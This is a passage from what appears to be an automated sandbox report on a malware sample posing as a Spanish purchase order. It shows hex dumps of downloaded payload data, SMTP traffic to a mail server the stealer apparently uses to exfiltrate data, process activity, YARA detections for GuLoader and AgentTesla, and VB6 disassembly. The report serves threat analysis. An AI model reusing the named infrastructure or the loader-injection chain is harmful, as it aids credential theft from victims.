44 29 9c 1d 1a 90 d1 a9 31 53 09 dc ee b1 bc 51 9a e2 99 4f 03 81 8d 86 fa e1 ec e9 03 0e 7f 32 dd 7d df 15 78 a8 33 54 77 0b 5b b3 c4 be d3 40 e3 c2 87 16 89 d5 91 d0 b1 8d Data Ascii: 1+i!J)@i)eg102R'Wq\F0%*r't87Fy+y6"r-y(=4k;O#bI"&]dT6K%}Fsg;gQjHnMV%Hu!CJ<nD)1SQO2}x3Tw[@
2021-10-14 02:15:48 UTC	212	IN	Data Raw: b7 00 18 40 45 25 54 df ba 49 fc ce 61 05 ff 03 68 6b 4c 19 c4 01 ef 71 6e c8 ee a9 40 1a 27 be 92 71 29 55 7b 28 95 f8 3f a0 1d 95 2d 5f b5 ad 68 1c b0 fc 6c e1 6f ba 8d fb 8d 42 de 8d 74 61 f2 41 2f 22 c9 13 ed 42 75 e3 2d 94 af 15 d2 a3 60 4a 81 e1 9c 68 75 de 9d be 66 05 eb 37 98 16 b3 34 ec 70 43 1c 54 69 1b 78 69 16 76 e6 05 a3 85 5a d2 56 bd 89 6d 07 96 0b fa b3 b7 6a 26 36 db 47 d3 2a e9 f7 04 98 34 4f fb 87 9a 2b ae 87 64 bd 3d 53 b2 97 2b 72 4c 77 31 24 a9 16 a8 a3 01 b4 a9 0a 89 4f 4e 05 73 42 61 61 cf 6c 15 50 f5 a1 dd 02 11 f4 99 cc ba 4e 4a 70 d5 5e 22 21 fd 60 2b ac 83 9d 29 ef 53 da c7 5e c2 75 7c d6 3b f4 14 52 d9 f0 51 76 25 fd 40 f3 a5 d0 d4 ef f0 fd a3 56 d9 08 7d 66 92 12 34 22 97 58 62 dc 3b f2 2e ea 84 cd f0 16 fd bc 80 15 fd 35 ff Data Ascii: @E%TIahkLqn@'q)U{(?-_hloBtaA/"Bu-`Jhuf74pCTixivZVmj&6G*4O+d=S+rLw1$ONsBaalPNJp^"!`+)S^u\|;RQv%@V}f4"Xb;.5
2021-10-14 02:15:48 UTC	214	IN	Data Raw: fd 9e 58 3f 3b 3d f6 ba 01 ff 56 88 0f bf 9d 92 3e 41 8b 01 41 61 90 0e 2b 47 66 85 11 56 47 ea e9 73 f9 99 73 e0 9a 69 33 17 19 a7 3e 06 f6 a7 90 30 b7 03 6a 2f e3 bb 5d cd 69 e2 ac d9 29 76 7f 3c 30 f8 03 55 e1 cd ca 55 bb 9f ea 1f 8f b4 e7 d1 1d 9d 60 a9 33 5a 47 8e 30 30 32 0a fa bb 17 e8 1e cb 73 b3 26 6d 36 97 60 65 d6 72 c8 87 ae 78 15 da 8e c0 35 62 02 9d 3d ba 2a 79 a4 0c 31 d3 93 e4 86 8a ef 17 19 96 7c fd 71 d8 a7 68 03 8a bf 5c 09 35 60 cb f6 9b 2b 18 4f 30 75 51 0c b4 87 88 8f aa ba 8a e0 80 fe 1f 0a 55 da cb d2 80 26 44 fb 1c 23 4e 8f 30 b4 11 f3 46 52 f6 61 57 20 b3 fc 8f 72 a3 63 07 36 0d bb 7b 05 40 4b 7f b5 4c 70 c4 0d ee 34 48 1c 6d 53 e5 2e 5d ec 60 33 17 00 12 a1 77 df 59 73 98 2f 76 57 22 8f 05 06 1a d9 ba 3c 40 15 bd ed 91 be 4d 87 Data Ascii: X?;=V>AAa+GfVGssi3>0j/]i)v<0UU`3ZG002s&m6`erx5b=*y1\|qh\5`+O0uQU&D#N0FRaW rc6{@KLp4HmS.]`3wYs/vW"<@M
2021-10-14 02:15:48 UTC	215	IN	Data Raw: 2c 2d 9a 29 a1 50 db 36 56 2f 32 6e 53 f6 65 62 81 4b de 2c eb 30 ad 47 01 d1 29 f9 1e 56 c0 63 3e d5 2c 3b 2a a9 46 f2 ca b4 3d 1d 5d 4a a2 e4 d8 a1 5b 6e 8f 74 79 e5 89 cf 6e 4a 19 c1 2f e1 6c 71 42 57 b0 54 16 28 ad 17 51 36 ca cf 37 9e eb 32 b5 9d 02 b1 6f ba 28 9e 84 aa eb 67 e6 14 3f 84 fb 9f 51 d5 9e 6c 7e fb 47 34 3b 56 a1 fd ce fa e5 2d 9f b4 91 ee bf 07 41 b3 88 93 e5 4a d4 be ba 60 16 e0 2d 97 0e a5 2e 68 c9 43 13 54 64 0d fd de 18 17 f0 84 03 9f 74 fc 43 35 25 71 83 2f 0a fa b0 4a 7e 62 39 dc d7 93 bb ed e5 84 c5 34 4f e6 01 dc 30 a9 17 7f 0d 31 40 a9 8b a1 66 40 71 12 36 a8 81 0b 20 96 bb b2 8c cc 54 4e 05 77 4b 67 7c db cd 8d 43 66 bd 9e 06 18 fc 83 51 1f 5d 5d 17 d5 4b 21 33 7e 26 24 c0 83 c9 20 f0 4c c8 45 d6 41 ae e1 87 ac 2b 89 ce f8 e2 Data Ascii: ,-)P6V/2nSebK,0G)Vc>,;*F=]J[ntynJ/lqBWT(Q672o(g?Ql~G4;V-AJ`-.hCTdtC5%q/J~b94O01@f@q6 TNwKg\|CfQ]]K!3~&$ LEA+
2021-10-14 02:15:48 UTC	216	IN	Data Raw: a1 ae 57 94 c2 49 8f b8 f4 69 e9 ff 99 91 a6 1b 97 9f ea ce 3f c5 9f c6 87 bc 26 63 19 1a 1d 14 37 c4 d5 72 3c 2d 64 58 b5 8f bf 44 2f 54 27 f1 a1 16 e7 4c 88 1c 36 11 95 2a de af 9c ec 7a 92 06 24 49 73 88 09 6b 5a ff fd 63 fc 9b 7f ea 94 60 33 18 29 a1 2b 12 e3 ac ad 20 88 0d 42 29 c2 b4 42 c2 67 e5 ad cf 27 70 6a 31 3d d0 35 59 f1 d0 cd d3 32 95 ff 96 d2 ab fd 5a 98 96 6e 20 74 45 d8 01 36 30 27 07 f0 89 97 e9 09 c8 6e bf 2b f2 ab 94 62 a4 d5 98 41 9c ad 64 01 d6 11 5c 2d 79 11 19 bc be 38 fa 16 13 bc 7a 9f f5 91 8a ec 8b 0a 06 f8 af e6 cf 22 ec 13 18 92 15 01 2b 66 c6 7b 14 28 19 cb 38 67 d1 4b ad 0c 1b e2 b8 3a 20 f4 91 f2 0b 0e 50 c8 cd d4 95 3f d5 dd 59 37 44 90 32 b0 03 ea c3 18 f8 69 5c 26 b9 e9 96 f6 0b 66 19 2f 89 1f 7e 0b 42 4d 74 b5 6d 61 c8 Data Ascii: WIi?&c7r<-dXD/T'L6*z$IskZc`3)+ B)Bg'pj1=5Y2Zn tE60'n+bAd\-y8z"+f{(8gK: P?Y7D2i\&f/~BMtma
2021-10-14 02:15:48 UTC	217	IN	Data Raw: d0 0e 2b 70 10 1b dc 98 28 ea 5f 42 05 fe 33 37 cb 90 ea df f0 19 25 76 fd 8f 12 15 e7 a4 0d e3 c3 50 06 18 4e 48 9e 65 d3 2a 2b 86 46 ae 5a c1 ab b2 22 22 4c 54 ea eb a7 97 d9 23 30 78 29 79 44 01 a8 29 ff 0c 46 53 7a d3 d5 2d 97 36 a0 44 f2 ca b2 28 16 48 59 a9 f7 de a1 54 e1 c7 7b 1e e4 a1 c1 68 53 97 27 2f e1 6a 77 4d 59 a2 5a 12 3e b7 9d 4c 3f c5 c2 3f 89 77 ae a6 0d 07 40 7f b5 ac 15 07 a5 76 8e f3 77 31 96 78 f6 4e d7 84 63 66 f5 48 33 22 ca 9b e6 5e fb 07 36 9a a4 15 ca a8 66 4e b3 88 94 74 f2 47 9f ad e8 e7 e9 22 98 11 a8 24 71 f4 5e 0f 55 7a 0b fd dc 06 1e fa 95 83 ba 7d f3 46 3d 22 e3 ee b8 02 c8 33 08 7e 86 db db 45 c7 2e eb f1 18 80 30 43 e6 00 49 23 b9 0e fa 9c 31 44 b6 88 a0 be 48 5f 1f 22 ab 83 6f 33 1b 6c b9 8e c9 58 56 8e e0 44 68 77 df Data Ascii: +p(_B37%vPNHe*+FZ""LT#0x)yD)FSz-6D(HYT{hS'/jwMYZ>L??w@vw1xNcfH3"^6fNtG"$q^Uz}F="3~E.0CI#1DH_"o3lXVDhw
2021-10-14 02:15:48 UTC	219	IN	Data Raw: 00 c4 65 db 64 4a 63 95 53 29 ac bd 57 12 72 86 c9 5c 11 54 9f 4d 4b ee a2 74 91 59 c6 05 b6 49 bf 68 1c 47 fe ce 72 31 77 3a b7 df 00 d3 18 0e 1d f5 7f 68 f5 9c b9 a2 0a 12 9b e0 e2 3f c0 8d 47 1a b2 34 e2 11 1a eb 06 b5 f9 da 52 37 2c 76 de 88 62 ba 59 28 5a 2a f4 a1 15 ff 4f 88 08 be b5 98 2f c9 bf 14 4e 6c 94 00 32 41 6b 9e 0d 55 5b f1 d5 6c e6 94 75 ee 90 1b 2f 6d 2c c8 23 2f eb 98 8d 10 82 13 4d 23 ff b0 5d cd 7c fe a0 cc 31 64 7f 25 25 f2 3f 5a e5 c5 c4 dc 26 9e f9 9b d3 a4 d5 51 99 99 70 38 74 5c 47 9d 3b 25 33 12 e8 b4 8a f5 1e de 6b b5 3e 77 38 01 e0 20 c4 1b d2 1e ac 63 0e c5 8f d8 3b 16 0a ba 3e a5 3d e6 18 1f 3a e6 91 ff 94 9e 73 8b 05 81 f3 b5 6c c2 2c f1 01 9d 30 0d 85 2c 7c 53 f1 9e 3e 9c 44 2c e6 4d 49 b4 92 9f ee b0 3c 28 f5 8d e8 1a 1e Data Ascii: edJcS)Wr\TMKtYIhGr1w:h?G4R7,vbY(Z*O/Nl2AkU[lu/m,#/M#]\|1d%%?Z&Qp8t\G;%3k>w8 c;>=:sl,0,\|S>D,MI<(
2021-10-14 02:15:48 UTC	220	IN	Data Raw: 71 aa d2 86 68 ad 0e 1f ad 8e 38 94 ad 1f da 0c a5 e9 ca fb 72 df 58 f4 17 ca 1d 8d ba b1 02 a8 a4 cc ec fa d8 da a7 7e 1a 29 06 2c 72 02 9b 38 8a a8 0e 53 42 06 ec b3 d3 d9 10 3f ce 70 e0 27 7e fa 8d 00 95 0b b6 8d 12 c8 70 02 0a ce a4 8f e5 3b 24 25 88 40 a9 58 d3 2b 5e 2a 32 6c 51 f8 6b 4b 86 59 cb 3e 6a a9 ac 55 80 91 27 f7 0b 44 41 fa 3f c5 ad 6b 24 a7 48 cf c4 bc a0 00 55 57 a7 c1 dd a9 c9 ef cf 66 10 ed 81 c5 69 42 17 cf 21 ef 64 7e 4a 5e ab 53 1a 64 bf 95 e4 38 d7 ca 2a 9b f6 37 a7 1f 87 ac 6a a7 2d 8d 06 b6 f6 62 f4 15 38 84 79 83 4c d0 83 69 6f fc 4f 3a 33 4b a2 ef 4c 7a eb 30 9a a6 12 57 ad 6e 44 93 88 81 66 73 de 9e bf 68 0b e5 25 9f 13 a7 26 6d e9 42 12 d9 67 09 fa 7c 84 1c f4 38 00 83 7a d3 44 3f 30 63 02 b6 0b 88 b2 09 6c ec 36 c9 c5 12 22 Data Ascii: qh8rX~),r8SB?p'~p;$%@X+^2lQkKY>jU'DA?k$HUWfiB!d~J^Sd87j-b8yLioO:3KLz0WnDfsh%&mBg\|8zD?0cl6"
2021-10-14 02:15:48 UTC	221	IN	Data Raw: 85 d6 fd e3 c0 95 50 2e d1 1d 15 bd 69 7b 15 8e 37 6a 6a 68 d9 1c 52 31 b5 cb 17 e6 1e cc 55 c0 94 fb d0 38 fa 7e 95 80 d2 ed 64 42 bf 12 11 8c eb 2d c3 cd c7 68 37 0f f2 8d 37 6f 34 f9 2f f7 69 c5 07 7c 22 a4 07 9b 65 33 ff 32 7b d9 ce 50 03 ca 88 cd b2 79 b3 6c fc cc 91 09 b9 8f f0 e7 cb 77 f6 f8 8f b9 01 d8 95 e6 a3 93 06 5f 36 6d 88 77 42 b6 b8 06 4a 13 69 56 95 5f 83 6b 59 20 55 80 d3 54 8c 2c fa 33 bb b7 ac 03 a2 cd 6f 21 11 f7 6e 55 7f 76 8a 0d 4b 5b f7 f5 6e fb 91 7d e0 9c 68 2f 05 2c a9 23 1a eb a9 8d 22 82 05 4a 2d e2 b5 40 c8 60 e2 a8 c4 2c 78 62 39 38 f0 37 52 f9 d8 d8 d4 22 9e f8 9e cf a1 f5 50 84 9c 72 28 73 54 5b 80 3e 38 2f 0f f4 a9 96 e8 02 c3 6e bd 3a 71 2a 85 e1 25 c4 1b c0 9a ad 65 09 c7 92 dd 29 7f 00 9a 3d b8 38 fb 1d 02 3f fb 94 f5 Data Ascii: P.i{7jjhR1U8~dB-h77o4/i\|"e32{Pylw_6mwBJiV_kY UT,3o!nUvK[n}h/,#"J-@`,xb987R"Pr(sT[>8/n:q*%e)=8?

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Oct 14, 2021 04:17:24.811098099 CEST	587	49788	185.111.89.226	192.168.11.20	220-cpanel32.tarhelypark.hu ESMTP Exim 4.94.2 #2 Thu, 14 Oct 2021 04:17:24 +0200 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 14, 2021 04:17:24.811794996 CEST	49788	587	192.168.11.20	185.111.89.226	EHLO 530978
Oct 14, 2021 04:17:24.833708048 CEST	587	49788	185.111.89.226	192.168.11.20	250-cpanel32.tarhelypark.hu Hello 530978 [102.129.143.96] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPE_CONNECT 250-STARTTLS 250 HELP
Oct 14, 2021 04:17:24.834151983 CEST	49788	587	192.168.11.20	185.111.89.226	STARTTLS
Oct 14, 2021 04:17:24.857367039 CEST	587	49788	185.111.89.226	192.168.11.20	220 TLS go ahead

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Orden de compra M244545.exe PID: 4904 Parent PID: 8108

General

Start time:	04:15:04
Start date:	14/10/2021
Path:	C:\Users\user\Desktop\Orden de compra M244545.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Orden de compra M244545.exe'
Imagebase:	0x400000
File size:	98304 bytes
MD5 hash:	7C04ECF5DC6999877E87CF9C1C933A3F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2743474154.0000000002A90000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: RegAsm.exe PID: 7080 Parent PID: 4904

General

Start time:	04:15:26
Start date:	14/10/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Orden de compra M244545.exe'
Imagebase:	0x7ff74e210000
File size:	65440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.7365965262.000000001E201000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.7365965262.000000001E201000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 2756 Parent PID: 7080

General

Start time:	04:15:27
Start date:	14/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff725a10000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: UserOOBEBroker.exe PID: 5620 Parent PID: 1040

General

Start time:	04:21:28
Start date:	14/10/2021
Path:	C:\Windows\System32\oobe\UserOOBEBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
Imagebase:	0x7ff6e5b00000
File size:	57856 bytes
MD5 hash:	BCE744909EB87F293A85830D02B3D6EB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Orden de compra M244545.exe PID: 4904 Parent PID: 8108 Orden de compra M244545.exeCOMMON

Executed Functions

Function 00413A60, Relevance: 110.7, APIs: 59, Strings: 4, Instructions: 479COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(00411064,00415010), ref: 00413AF9
__vbaObjSet.MSVBVM60(?,00000000), ref: 00413B18
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410E9C,000000F8), ref: 00413B3E
__vbaNew2.MSVBVM60(00411064,00415010), ref: 00413B57
__vbaObjSet.MSVBVM60(?,00000000), ref: 00413B70
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410E9C,000001B4), ref: 00413C20
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00413C30
#606.MSVBVM60(00000001,?), ref: 00413C4D
__vbaStrMove.MSVBVM60 ref: 00413C58
__vbaStrCmp.MSVBVM60(00410ED0,00000000), ref: 00413C6A
__vbaFreeStr.MSVBVM60 ref: 00413C79
__vbaFreeVar.MSVBVM60 ref: 00413C88
#706.MSVBVM60(00000001,00000000,00000000), ref: 00413C99
__vbaStrMove.MSVBVM60 ref: 00413CA4
__vbaNew2.MSVBVM60(00410E7C,00415590), ref: 00413CBD
__vbaHresultCheckObj.MSVBVM60(00000000,02AD004C,00410E6C,00000014), ref: 00413CE2
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410E8C,00000070), ref: 00413D09
__vbaFreeObj.MSVBVM60 ref: 00413D12
#580.MSVBVM60(Stalakitter,00000001), ref: 00413D1F
#574.MSVBVM60(00000002), ref: 00413D37
__vbaStrMove.MSVBVM60 ref: 00413D42
__vbaStrCmp.MSVBVM60(00410EF4,00000000), ref: 00413D4E
__vbaFreeStr.MSVBVM60 ref: 00413D5D
__vbaFreeVar.MSVBVM60 ref: 00413D66
#594.MSVBVM60(00000002), ref: 00413D81
__vbaFreeVar.MSVBVM60 ref: 00413D8A
#648.MSVBVM60(00000002), ref: 00413D96
__vbaFreeVar.MSVBVM60 ref: 00413D9F
__vbaVarDup.MSVBVM60 ref: 00413DBB
#666.MSVBVM60(?,00000002), ref: 00413DC9
__vbaVarMove.MSVBVM60 ref: 00413DD5
__vbaFreeVar.MSVBVM60 ref: 00413DDE
__vbaNew2.MSVBVM60(00411064,00415010), ref: 00413E1A
__vbaObjSet.MSVBVM60(?,00000000), ref: 00413E33
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410E9C,000000F8), ref: 00413E5D
__vbaHresultCheckObj.MSVBVM60(00000000,00401140,00410A8C,000006F8), ref: 00413E94
__vbaFreeObj.MSVBVM60 ref: 00413E9D
__vbaNew2.MSVBVM60(00411064,00415010), ref: 00413EB6
__vbaObjSet.MSVBVM60(?,00000000), ref: 00413ECF
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410E9C,00000130), ref: 00413EF6
__vbaLateIdCallLd.MSVBVM60(00000002,?,00000000,00000000), ref: 00413F08
__vbaStrVarMove.MSVBVM60(00000000), ref: 00413F12
__vbaStrMove.MSVBVM60 ref: 00413F1D
__vbaFreeStr.MSVBVM60 ref: 00413F44
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00413F54
__vbaFreeVar.MSVBVM60 ref: 00413F60
__vbaNew2.MSVBVM60(00411064,00415010), ref: 00413F75
__vbaObjSet.MSVBVM60(?,00000000), ref: 00413F8E
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410E9C,00000078), ref: 00413FB8
__vbaHresultCheckObj.MSVBVM60(00000000,00401140,00410A8C,000006FC), ref: 00414009
__vbaFreeObj.MSVBVM60 ref: 0041400E
__vbaHresultCheckObj.MSVBVM60(00000000,00401140,00410A5C,000002B4), ref: 0041402F
__vbaVarAdd.MSVBVM60(00000002,?,?), ref: 0041405D
__vbaVarMove.MSVBVM60 ref: 00414064
#598.MSVBVM60 ref: 0041406A
__vbaVarTstLt.MSVBVM60(00000002,?), ref: 00414088
__vbaFreeVar.MSVBVM60(004140F2), ref: 004140E1
__vbaFreeStr.MSVBVM60 ref: 004140E6
__vbaFreeVar.MSVBVM60 ref: 004140EF

Strings

zk:K&6, xrefs: 00413F96, 00413F9C
Stalakitter, xrefs: 00413D1A
, xrefs: 00413C3C
Mallorcinerens, xrefs: 00413DAA

Memory Dump Source

Source File: 00000000.00000002.2740959877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2740924424.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.2741103945.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.2741140144.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$Move$New2$List$#574#580#594#598#606#648#666#706CallLate
String ID: $Mallorcinerens$Stalakitter$zk:K&6
API String ID: 1003127262-3539258339
Opcode ID: b71ad9a302614693cc4143ca2f5d9b18a1bf1e3f416f9ce30331b280bb6b1dd3
Instruction ID: 31342ccf4fc34faa475af20bd56955d7a9fd4b189232353e9d129f41bf0d3271
Opcode Fuzzy Hash: b71ad9a302614693cc4143ca2f5d9b18a1bf1e3f416f9ce30331b280bb6b1dd3
Instruction Fuzzy Hash: A0124A70A003199FDB10DFA5DD88BDEBBB8FF48704F10816AE549A7260DB746A85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 004012B4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6"*), ref: 004012B9

Strings

VB5!6"*, xrefs: 004012B4

Memory Dump Source

Source File: 00000000.00000002.2740959877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2740924424.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.2741103945.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.2741140144.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6"*
API String ID: 1341478452-2992194029
Opcode ID: 469c89939cef8e6f53890b4b3ea478becd9e523327737d55b27c121949767884
Instruction ID: 7629933c65c8ae616a90b809ea14ab6aa51becaf66a0b0dbd647d4db3bd46d68
Opcode Fuzzy Hash: 469c89939cef8e6f53890b4b3ea478becd9e523327737d55b27c121949767884
Instruction Fuzzy Hash: 61F06F6040E7C45FE70B9B7148225253FB09E8321030A84EBC482DF0F3C2A90C8DCBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00401432, Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2740959877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2740924424.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.2741103945.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.2741140144.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58187ee0e133b0b48bb3efed7ac890b15464e5e05c24970065dea5c804966976
Instruction ID: d394a65342a6a254380257ba0734a19f866dc21ad068f5b1ddaac111a7468d93
Opcode Fuzzy Hash: 58187ee0e133b0b48bb3efed7ac890b15464e5e05c24970065dea5c804966976
Instruction Fuzzy Hash: F641279025E2D4EFC71B47B64CBA2813FE1AE07108B1A88EFD6D54B8A3E555241FC727

Uniqueness

Uniqueness Score: -1.00%

Function 0040166E, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2740959877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2740924424.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.2741103945.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.2741140144.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e24cef5b52d058c6559a4647f5f96652dbae51e6763f7f5d8b23a4fe3d590a8
Instruction ID: 0ef76ab4ed2bcdf07a831812e9108315abc5032b0251afc9fc56c28be75d868b
Opcode Fuzzy Hash: 9e24cef5b52d058c6559a4647f5f96652dbae51e6763f7f5d8b23a4fe3d590a8
Instruction Fuzzy Hash: 5E11DAB150E3E59FCB174B748CB52527FB0AF1B20070A44EBD4819F8A7E268281ED727

Uniqueness

Uniqueness Score: -1.00%

Function 00401621, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2740959877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2740924424.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.2741103945.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.2741140144.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 072463a7c437865975a3864d9424ff10385e28a77ccb1411e9edc6cac81fba01
Instruction ID: 3a4f40afd7daac755765d0dbc513794409bb1d663c47dbf88c845af7c1cdfe86
Opcode Fuzzy Hash: 072463a7c437865975a3864d9424ff10385e28a77ccb1411e9edc6cac81fba01
Instruction Fuzzy Hash: CBF07A70124154EFCB06CF74D8A5A063BE1AF5B3407451CDAD9108F475D736B865EB12

Uniqueness

Uniqueness Score: -1.00%

Function 004135F0, Relevance: 40.8, APIs: 27, Instructions: 282COMMON

Download Yara Rule

APIs

#685.MSVBVM60 ref: 00413642
__vbaObjSet.MSVBVM60(?,00000000), ref: 00413653
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410EAC,0000001C), ref: 00413670
__vbaFreeObj.MSVBVM60 ref: 00413688
__vbaNew2.MSVBVM60(00410E7C,00415590), ref: 004136A9
__vbaHresultCheckObj.MSVBVM60(00000000,02AD004C,00410E6C,00000014), ref: 004136CE
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410E8C,000000D0), ref: 004136F8
__vbaStrMove.MSVBVM60 ref: 0041370D
__vbaFreeObj.MSVBVM60 ref: 00413712
#539.MSVBVM60(?,00000001,00000001,00000001), ref: 00413722
__vbaStrVarMove.MSVBVM60(?), ref: 0041372C
__vbaStrMove.MSVBVM60 ref: 00413737
__vbaFreeVar.MSVBVM60 ref: 0041373C
#568.MSVBVM60(00000063), ref: 00413744
__vbaNew2.MSVBVM60(00411064,00415010), ref: 0041375D
__vbaObjSet.MSVBVM60(?,00000000), ref: 00413776
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410EBC,00000178), ref: 004137F7
__vbaFreeObj.MSVBVM60 ref: 00413800
__vbaNew2.MSVBVM60(00411064,00415010), ref: 00413819
__vbaObjSet.MSVBVM60(?,00000000), ref: 00413838
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410E9C,000000F8), ref: 0041385B
__vbaNew2.MSVBVM60(00411064,00415010), ref: 00413874
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041388D
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410E9C,000001B4), ref: 00413928
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00413938
__vbaFreeStr.MSVBVM60(00413980), ref: 00413978
__vbaFreeStr.MSVBVM60 ref: 0041397D

Memory Dump Source

Source File: 00000000.00000002.2740959877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2740924424.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.2741103945.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.2741140144.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$New2$Move$#539#568#685List
String ID:
API String ID: 342513763-0
Opcode ID: c6bd7f9af8cefabff7c6e676470fd1cf09c494c93342f1c142e42c4f567a57c1
Instruction ID: f792b7ebcbcb625830671be0bc27f21cc3ec9c69a30b265348179efaeecac593
Opcode Fuzzy Hash: c6bd7f9af8cefabff7c6e676470fd1cf09c494c93342f1c142e42c4f567a57c1
Instruction Fuzzy Hash: C6B14C74A00304EFCB14DFA9C988ADABBF9FF48700F14856AE509E72A1D7749981CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00413280, Relevance: 22.7, APIs: 15, Instructions: 192COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(00411064,00415010), ref: 004132D3
__vbaObjSet.MSVBVM60(?,00000000), ref: 004132F2
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410E9C,000001B0), ref: 00413331
__vbaFreeObj.MSVBVM60 ref: 0041333A
__vbaNew2.MSVBVM60(00411064,00415010), ref: 00413353
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041336C
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410E9C,00000098), ref: 0041338F
__vbaNew2.MSVBVM60(00411064,00415010), ref: 004133A8
__vbaObjSet.MSVBVM60(?,00000000), ref: 004133C1
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410E9C,000001B4), ref: 00413450
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00413460
__vbaNew2.MSVBVM60(00411064,00415010), ref: 0041347C
__vbaObjSet.MSVBVM60(?,00000000), ref: 00413495
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410E9C,000001A8), ref: 004134B8
__vbaFreeObj.MSVBVM60 ref: 004134C1

Memory Dump Source

Source File: 00000000.00000002.2740959877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2740924424.0000000000400000.00000002.00020000.sdmp Download File
